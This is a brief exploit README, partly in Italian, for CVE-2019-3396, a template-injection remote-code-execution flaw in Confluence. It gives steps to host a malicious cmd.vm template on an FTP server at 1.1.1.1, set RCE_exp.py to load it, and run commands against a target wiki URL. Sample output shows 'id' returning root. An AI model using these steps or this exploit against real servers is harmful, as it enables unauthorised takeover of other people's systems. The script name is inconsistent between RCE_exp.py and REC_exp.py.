
CVE-2019-3396 confluence SSTI RCE
CVE-2019-3396 confluence SSTI RCE
1、metti il cmd.vm sul tuo sito web (deve usare ftp o https, http non funziona)
2、modifica RCE_exp.py,cambia filename = 'ftp://1.1.1.1/cmd.vm' (python -m pyftpdlib -p 21)
3、python REC_exp.py http://test.wiki_test.cc:8080 "whoami"
$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
uid=0(root) gid=0(root) groups=0(root)